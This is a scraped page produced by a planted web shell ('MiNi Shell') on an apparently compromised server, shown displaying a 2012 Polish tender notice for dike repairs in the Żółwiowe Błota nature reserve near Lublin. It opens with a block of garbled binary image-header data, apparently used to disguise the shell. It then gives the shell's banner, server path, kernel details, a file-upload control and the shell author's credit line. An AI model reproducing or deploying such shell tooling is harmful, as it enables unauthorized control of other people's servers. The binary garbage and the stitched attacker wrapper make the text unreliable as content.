JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120911/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120911/194885-N-2012.html

<p class="kh_header"><b>Lublin: Remont grobli w rezerwacie `Żółwiowe Błota`w ramach realizacji projektu POIŚ.05.01.00-00-228/09 `Ochrona siedlisk przyrodniczych i gatunków na obszarach sieci Natura 2000 w województwie lubelskim`</b><br>
<b>Numer ogłoszenia: 194885 - 2012; data zamieszczenia: 11.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalna Dyrekcja Ochrony Środowiska w Lublinie , ul. Bazylianówka 46, 20-144 Lublin, woj. lubelskie, tel. 81 710 65 00, faks 81 710 65 01.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont grobli w rezerwacie `Żółwiowe Błota`w ramach realizacji projektu POIŚ.05.01.00-00-228/09 `Ochrona siedlisk przyrodniczych i gatunków na obszarach sieci Natura 2000 w województwie lubelskim`.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia
obejmuje: 1. remont korpusu grobli nr 2 w km 0+650 -0+950. Na odcinku 0+650-0+890 tej grobli zarówno
rzędne korony jak i przekrój poprzeczny nie odpowiadają założeniom projektu pierwotnego. Nastąpiło
znaczne obniżenie korony grobli na tym odcinku przy jednoczesnym zmniejszeniem przekroju. Nie zbędne
jest uzupełnienie ubytków gruntu w korpusie grobli do projektowanej rzędnej korony z zachowaniem
projektowanych nachyleń skarp grobli. Przewiduje się dowóz niezbędnych mas ziemi i uzupełnienie nasypu
gruntu w korpusie grobli z ubiciem warstwami do wymaganego stopnia zagęszczenia. Uzupełnienia
ubytków grobli po wyrównaniu skarp i korony należy obsiać mieszanką traw. Ilość ma ziemnych niezbędna
do uzupełnienia ubytków w grobli - 484 m3. W km 0+728 grobli planowana jest wymiana leżaka oraz
szandorów (zamknięć) w istniejącym mnichu drewnianym. Szczególną uwagę należy zwrócić na właściwe
oglinowanie przewodu leżaka; 2. remont korpusu grobli nr 6 w km 0+100-0+400. Na odcinku 0+200 -0+400
tej grobli zarówno rzędne korony jak i przekrój poprzeczny nie odpowiadają założeniom projektu pierwotnego. Nastąpiło znaczne obniżenie korony grobli na tym odcinku przy jednoczesnym zmniejszeniem
przekroju . Nie zbędne jest uzupełnienie ubytków gruntu korpusie grobli do projektowanej rzędnej korony z
zachowaniem projektowanych nachyleń skarp grobli. Przewiduje się dowóz niezbędnych mas ziemi i
uzupełnienie nasypu gruntu w korpusie grobli z ubiciem warstwami do wymaganego stopnia zagęszczenia.
Uzupełnienia ubytków grobli po wyrównaniu skarp i korony należy obsiać mieszanką traw. Ilość mas
ziemnych niezbędna do uzupełnienia ubytków w grobli - 339 m3. Ponadto w km 0+277-0+283 oraz 0+305-
0+315 przelewająca się woda przez obniżoną koronę grobli wymy ła dwie wyrwy w korpusie grobli o łącznej
kubaturze 76 m3. Likwidacja wyrwy w km 0+305-0+315 wymaga zatrzymania przepływającej przez wyrwę
wody grodzią ziemno faszynową i skierowanie jej do mnicha w km 0+132 grobli. W km 0+132 grobli
planowana jest wymiana leżaka oraz szandorów (zamknięć) w istniejącym mnichu drewnianym.
Szczególną uwagę należy zwrócić na właściwe oglinowanie przewodu leżaka; 3. usunięcie zakrzaczeń na
powierzchni 0,04 ha (dotyczy grobli nr 2) oraz na powierzchni 0,06 ha (dotyczy grobli nr 6); 4. wykoszenie
porostów na koronie i skarpach z wygrabieniem na po wierzchni 0,64 ha (dotyczy grobli nr 2) oraz na
powierzchni 0,41 ha (doty- czy grobli nr 6); 5. obsługę geodezyjną prowadzonych robót w liniach
regulujących własno- ści; 6. inwentaryzację powykonawczą; 7. przygotowanie kompletnej dokumentacji
powykonawczej; 8. przywrócenie terenu w rejonie prowadzonych robót do stanu pierwotnego.
9.Szczegółowy zakres robót budowlanych określa dokumentacja projektowa oraz Specyfikacja Techniczna
Wykonania i Odbioru Robót Budowlanych (załącznik nr 8 i nr 9 do SIWZ).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.10.00.00-8, 45.11.00.00-1, 45.11.10.00-8, 45.11.12.00-0, 45.11.12.13-4, 45.11.12.91-4, 45.11.20.00-5, 45.11.21.00-6, 45.11.22.10-0, 45.20.00.00-9, 45.24.00.00-1, 45.24.70.00-0, 45.24.72.30-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 17.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie ma wymogu wnoszenia wadium przez Wykonawców</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Jako spełniający warunki udziału w postępowaniu zostaną ocenieni wykonawcy, którzy wykażą
dysponowanie osobą/ami posiadającą/ymi odpowiednie kwalifikacje do kierowania robotami
budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń i specjalizacji
technicznobudowlanej do kierowania robotami budowlanymi w zakresie budowli
hydrotechnicznych lub obiektów budowlanych melioracji wodnych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Formularz ofertowy - w przypadku składania oferty przez podmioty występujące wspólnie należy podać
nazwy (firmy) oraz dokładne adresy wszystkich wykonawców składających ofertę wspólną. 2.Oświadczenie
o części zamówienia, której wykonanie, wykonawca zamierza powierzyć podwykonawcom w przypadku
powierzenia przez wykonawcę części zamówienia podwykonawcom. 3.Pełnomocnictwo do
reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy, w
przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ustawy
Prawo zamówień publicznych (dotyczy również wspólników spółki cywilnej). 4.Pełnomocnictwo do
występowania w imieniu wykonawcy, w przypadku gdy dokumentów składających się na ofertę nie
podpisuje osoba uprawniona do reprezentowania wykonawcy zgodnie z odpisem z Krajowego Rejestru
Sądowego lub wykonawca - w przypadku osób fizycznych. 5.W sytuacji, gdy Wykonawca polega na wiedzy
i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach
finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków,
zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji
zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do
oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu
zamówienia. 6.Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub
miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w III.4.3), zastępuje się je
dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym,
administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca
zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionym
nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Strony dopuszczają następujące rodzaje i warunki zmiany treści umowy: 1) zmiana materiałów
budowlanych, sprzętu, urządzeń, gdy wykorzystanie materiałów budowlanych, sprzętu, urządzeń
wskazanych w dokumentacji projektowej lub ofercie stanie się niemożliwe bądź podyktowane będzie
usprawnieniem procesu budowy, zwiększeniem bezpieczeństwa na budowie, 2) zmiana przyjętych
technologii wykonania robót oraz inne nieistotne zmiany treści umowy, w zakresie niezbędnym do realizacji
przedmiotu zamówienia - w szczególności w przypadku lokalnych zmian warunków geologicznych podłoża
w stosunku do opracowanej dokumentacji projektowej, na podstawie której realizowana jest niniejsza
umowa, stosownie do zaistniałych zmian warunków geologicznych podłoża; 3) zmiana terminu realizacji
przedmiotu zamówienia, w przypadku: a) działania siły wyższej, uniemożliwiającej wykonanie umowy w
określonym pierwotnie terminie, b) błędów w dokumentacji projektowej, których usunięcie będzie
poprzedzać konieczność konsultacji z projektantem i naniesienia przez niego poprawek lub zmian w
projekcie, c) zaistnienia niesprzyjających warunków atmosferycznych, uniemożliwiających wykonywanie
prac budowlanych zgodnie z przyjęta technologią lub spełnienie wymogów technologicznych,
udokumentowanych w dzienniku budowy, d) przerwy w dostawie prądu, wody, gazu, trwającej ponad 7 dni,
e) wydłużenia terminów dostaw materiałów z przyczyn niezależnych od Wykonawcy, f) konieczności
uzyskania decyzji lub uzgodnień, mogących spowodować wstrzymanie robót, g) konieczności wykonania
dodatkowych badań i ekspertyz, h) konieczności wykonania prac lub badań archeologicznych,
powodujących konieczność wstrzymania robót objętych niniejszą umową, 4) zmiana personelu
wymienionego w załączonym do umowy wykazie osób w przypadku wystąpienia uzasadnionej przyczyny;
2.Zmiany umowy przewidziane w pkt 1 dopuszczalne są na następujących warunkach: - ad pkt 1) -
zamiana na materiały, urządzenia i sprzęt posiadające co najmniej takie same parametry techniczne,
jakościowe i cechy użytkowe, jak te, które stanowiły podstawę wyboru oferty, pod warunkiem nie
zwiększania wynagrodzenia; - ad pkt. 2) - zmiana na inne technologie wykonania robót oraz inne nieistotne
zmiany treści umowy,w zakresie niezbędnym do realizacji przedmiotu zamówienia, stosownie do
zaistniałych zmian warunków realizacji robót, pod warunkiem nie zwiększania wynagrodzenia; - ad pkt. 3) -
zmiana terminu realizacji zamówienia: lit. a) - o okres niezbędny do usunięcia skutków działania siły
wyższej, lit. b) - o okres konsultacji z projektantem i nanoszenia przez niego poprawek lub zmian w
projekcie, lit. c) - o czas trwania niesprzyjających warunków atmosferycznych, lit. d) - o okres
występowania przerwy w dostawie prądu, wody lub gazu, trwającej ponad 7 dni lit. e) - o okres wydłużenia
terminów dostaw materiałów, lit. f) - o okres niezbędny do uzyskania wymaganych decyzji bądź uzgodnień,
lit. g) - o okres niezbędny do wykonania dodatkowych badań i ekspertyz, lit. h) - o okres niezbędny do
wykonania prac lub badań archeologicznych, - ad pkt 4) - na osoby wskazane przez Wykonawcę,
posiadające wymagane uprawnienia oraz doświadczenie, zgodnie z warunkami udziału w postępowaniu o
udzielenie zamówienia, w wyniku którego oferta Wykonawcy została wybrana jako najkorzystniejsza, i
zaakceptowane na piśmie przez Zamawiającego, zgodnie z wnioskiem o którym mowa w § 9 ust. 2 umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lublin.rdos.gov.pl (w zakładce Zamówienia Publiczne)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Regionalna Dyrekcja Ochrony Środowiska w Lublinie - 20-144 Lublin, ul. Bazylianówka 46, pokój nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.09.2012 godzina 09:30, miejsce: Regionalna Dyrekcja Ochrony Środowiska w Lublinie - 20-144 Lublin, ul. Bazylianówka 46, pokój nr 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Przedmiot zamówienia współfinansowany jest przez Unię Europejską ze środków
Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Infrastruktura i
Środowisko pt.: /Ochrona siedlisk przyrodniczych i gatunków na obszarach sieci Natura 2000 w
województwie lubelskim/ POIŚ.05.01.00-00-228/09. 2.Osobami upoważnionymi do kontaktowania się z
wykonawcami są: 2.1.W zakresie przedmiotu zamówienia: p. Janusz Holuk - telefon (82) 560-51-61 lub p.
Robert Bochen - telefon (82) 560-51-64. 2.2.W zakresie procedury: p. Waldemar Mańko - telefon (81) 710-65-39.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com